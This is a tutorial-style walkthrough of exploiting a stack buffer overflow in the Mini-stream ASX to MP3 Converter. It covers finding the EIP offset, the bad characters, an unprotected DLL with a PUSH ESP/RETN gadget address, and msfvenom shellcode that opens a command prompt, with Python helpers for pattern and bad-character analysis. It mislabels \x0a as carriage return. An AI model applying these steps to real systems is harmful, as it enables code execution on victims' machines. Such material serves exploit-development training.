Buffer Overflow

Step 1.

Passing the provided fuzz file to the application crashes it.

Step 2.

Opening the fuzz file (.asx) in Notepad++ shows that it contains a string starting with http:// followed by a long run of A characters.

Step 3.

Create a Python script that generates a similar file for us.

Step 4.

Start Immunity Debugger and check whether the generated .asx file overwrites the value of EIP. The application crashes with an access violation error.

Step 5.

Now we have to find the exact offset at which EIP is overwritten.

5.1 Binary Tree Analysis

Send 5000 * B at the end of the buffer to check whether EIP is overwritten with the value of B.

After a few tries we found that sending A * 15000 followed by B * 5000 overwrites EIP with B.

5.2 Sending Unique string

• Now that we know that, within the 20000-byte buffer, EIP is overwritten somewhere in the last 5000 bytes, we can use the msfvenom script “pattern_create.rb” to create 5000 unique characters.

• After updating the code with the unique characters, we got the result below:

• Now we find the exact location of the value that landed in EIP.

• We can do this with another msfvenom script, “pattern_offset.rb”.

5.3 Basic calculation

A * (15000 + 2417 = 17417) + B * 4 (the value that lands in EIP) + C * (20000 - 17417 - 4) (the remaining buffer)

Updating the code as required:

We are now able to control EIP.
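The pattern-and-offset steps in 5.2 and the arithmetic in 5.3 can be reproduced without the Metasploit tools. The script below is an added example, not the page's own code: it re-implements the triplet pattern that pattern_create.rb emits and the little-endian lookup that pattern_offset.rb performs, then applies the 5.3 layout calculation. The EIP value it looks up is derived from the pattern itself (a constructed stand-in for the value read off the debugger), and eip_for_offset and buffer_layout are helper names chosen here, not tool names.

```python
# Added example: re-implementation of pattern_create.rb / pattern_offset.rb
# behaviour plus the step 5.3 buffer arithmetic. Not the page's script.
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes before the triplets would repeat


def pattern_create(length: int) -> bytes:
    """Cyclic pattern of `length` bytes (Aa0Aa1Aa2...), like pattern_create.rb."""
    if length > MAX_PATTERN:
        raise ValueError(f"pattern longer than {MAX_PATTERN} bytes would repeat")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Offset of the 4 pattern bytes that landed in EIP, like pattern_offset.rb.

    The debugger shows EIP as a 32-bit number; x86 is little-endian, so the
    bytes sit in the buffer in reverse order and the value is packed with "<I"
    before searching.
    """
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    if idx == -1:
        raise ValueError(f"0x{eip_value:08x} does not occur in the pattern")
    if pattern.find(needle, idx + 1) != -1:
        raise ValueError(f"0x{eip_value:08x} occurs more than once; use a longer pattern")
    return idx


def eip_for_offset(pattern: bytes, offset: int) -> int:
    """Value the debugger would show in EIP if the pattern overwrote it at `offset`.

    Demo helper (hypothetical name) so the example runs without a real crash.
    """
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


def buffer_layout(prefix_len: int, offset: int, total: int) -> dict:
    """Step 5.3 arithmetic: A padding up to EIP, 4 bytes of B in EIP, C for the rest."""
    eip_at = prefix_len + offset
    return {"A": eip_at, "B": 4, "C": total - eip_at - 4}


if __name__ == "__main__":
    pat = pattern_create(5000)
    eip = eip_for_offset(pat, 2417)           # constructed crash value
    print(f"EIP=0x{eip:08x} -> offset {pattern_offset(pat, eip)}")
    print(buffer_layout(15000, 2417, 20000))  # {'A': 17417, 'B': 4, 'C': 2579}
```

pattern_offset refuses an ambiguous hit rather than silently returning the first one; with the Metasploit triplet scheme a 4-byte window is unique well past 5000 bytes, so the check only fires if a longer pattern wraps.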

Step 6.

Now we have to check for bad characters, which either truncate or terminate the buffer. So we send every possible byte value in the code.

After analysis, we found that the bad characters are the null byte \x00 and carriage return \x0a.
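The comparison behind step 6 is mechanical: send the full byte range, read back what survived in memory, and exclude whichever byte was altered or ended the copy, repeating until the whole sequence is intact. The code below is an added example, not the page's own script; fake_dump is a constructed stand-in for the debugger that imitates the page's finding (the copy ends at \x0a), not memory read from the application.

```python
# Added example: bad-character sequence generation and dump comparison.
# The "dump" source is constructed; it is not output from the real application.

def badchar_sequence(exclude=(0x00,)) -> bytes:
    """All byte values 0x00-0xff in order, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def compare_dump(sent: bytes, dumped: bytes) -> dict:
    """Compare the bytes sent with the bytes found in memory.

    Reports the first byte whose copy differs, or the byte at which the dump
    ends early (truncation), so the next round can exclude it and resend.
    """
    n = min(len(sent), len(dumped))
    for i in range(n):
        if sent[i] != dumped[i]:
            return {"index": i, "sent": sent[i], "found": dumped[i], "truncated": False}
    if len(dumped) < len(sent):
        return {"index": n, "sent": sent[n], "found": None, "truncated": True}
    return {"index": None, "sent": None, "found": None, "truncated": False}


def find_bad_chars(dump_fn, max_rounds=256) -> list:
    """Iterate send/compare/exclude until the whole sequence survives intact.

    `dump_fn` takes the bytes sent and returns what was read back from memory
    (in practice, the bytes copied out of the debugger after the crash).
    """
    bad = [0x00]  # the null byte is excluded up front, as in the page
    for _ in range(max_rounds):
        sent = badchar_sequence(bad)
        result = compare_dump(sent, dump_fn(sent))
        if result["index"] is None:
            return bad
        bad.append(result["sent"])
    return bad


def fake_dump(sent: bytes) -> bytes:
    """Constructed stand-in for the debugger: the copy stops at the first \\x0a."""
    cut = sent.find(b"\x0a")
    return sent if cut == -1 else sent[:cut]


if __name__ == "__main__":
    print([hex(b) for b in find_bad_chars(fake_dump)])  # ['0x0', '0xa']
```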

Step 7.

Now we have to find a module that has no protections such as ASLR, Rebase, SEH, DEP, etc. To do so we use the mona.py script within Immunity Debugger.

Using the command “!mona modules”

we are able to identify such a module:

Log data, item 32

Address=0BADF00D

Message= 0x10000000 | 0x1007f000 | 0x0007f000 | False | False | False | False | False | -1.0- [MSA2Mfilter03.dll] (C:\Program Files (x86)\Mini-stream\ASX to MP3 Converter\MSA2Mfilter03.dll)
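The module line above is mona's table row, whose columns are Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path. Reading those flags is also what a defender does when auditing which DLLs an application loads without mitigations. The parser below is an added example, not mona's own code; SAMPLE_LOG contains the page's line plus a second, constructed row (EXAMPLE_protected.dll) to show a fully protected module.

```python
# Added example: parse "!mona modules" rows and list modules with no
# Rebase/SafeSEH/ASLR/NXCompat protection. Second sample row is constructed.
import re

SAMPLE_LOG = """\
Message= 0x10000000 | 0x1007f000 | 0x0007f000 | False | False | False | False | False | -1.0- [MSA2Mfilter03.dll] (C:\\Program Files (x86)\\Mini-stream\\ASX to MP3 Converter\\MSA2Mfilter03.dll)
Message= 0x75a00000 | 0x75b00000 | 0x00100000 | True | True | True | True | True | 1.0.0.0 [EXAMPLE_protected.dll] (C:\\Windows\\System32\\EXAMPLE_protected.dll)
"""

FLAG_NAMES = ("rebase", "safeseh", "aslr", "nxcompat", "os_dll")
# Module name in [...], then the path in (...); the path itself may contain
# parentheses such as "(x86)", so the path group is greedy up to the final ")".
NAME_RE = re.compile(r"\[(?P<name>[^\]]+)\]\s*\((?P<path>.*)\)\s*$")


def parse_module_line(line: str):
    """Return a dict for one module row, or None if the line is not a module row."""
    body = line.split("Message=", 1)[-1]
    cols = [c.strip() for c in body.split("|")]
    if len(cols) < 9 or not cols[0].startswith("0x"):
        return None
    flags = {name: cols[3 + i] == "True" for i, name in enumerate(FLAG_NAMES)}
    m = NAME_RE.search(cols[8])
    return {
        "base": int(cols[0], 16),
        "top": int(cols[1], 16),
        "size": int(cols[2], 16),
        **flags,
        "name": m.group("name") if m else cols[8],
        "path": m.group("path") if m else "",
    }


def unprotected_modules(log: str) -> list:
    """Names of modules where Rebase, SafeSEH, ASLR and NXCompat are all False."""
    rows = [r for r in map(parse_module_line, log.splitlines()) if r]
    return [r["name"] for r in rows
            if not any(r[f] for f in ("rebase", "safeseh", "aslr", "nxcompat"))]


if __name__ == "__main__":
    for name in unprotected_modules(SAMPLE_LOG):
        print("no mitigations:", name)  # no mitigations: MSA2Mfilter03.dll
```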

We can use the search command within the module, or search for an instruction sequence.

Search command -> jmp esp (not found in the module)

Search sequence -> push esp

retn

A reliable address in memory containing PUSH ESP followed by RETN was found at:

1003DF73 54 PUSH ESP

1003DF74 C3 RETN

Step 8.

Now that we have found the address of the PUSH ESP instruction, which also contains none of our bad characters, we can place it in EIP using the code below.

The screenshot below shows that the PUSH ESP address is now in our instruction pointer, EIP.

Step 9.

Now we are ready to place our shellcode in the remaining buffer.

To do so we need shellcode, which we can generate with msfvenom.

We also know that our ESP register points to the beginning of our shellcode; we need to provide some stack space for the decoder that msfvenom generates automatically to work.

We add no-operation instructions (NOPs, “\x90”) to the code.

Step 10.

Getting the command prompt.

The command prompt opens via the vulnerable application.
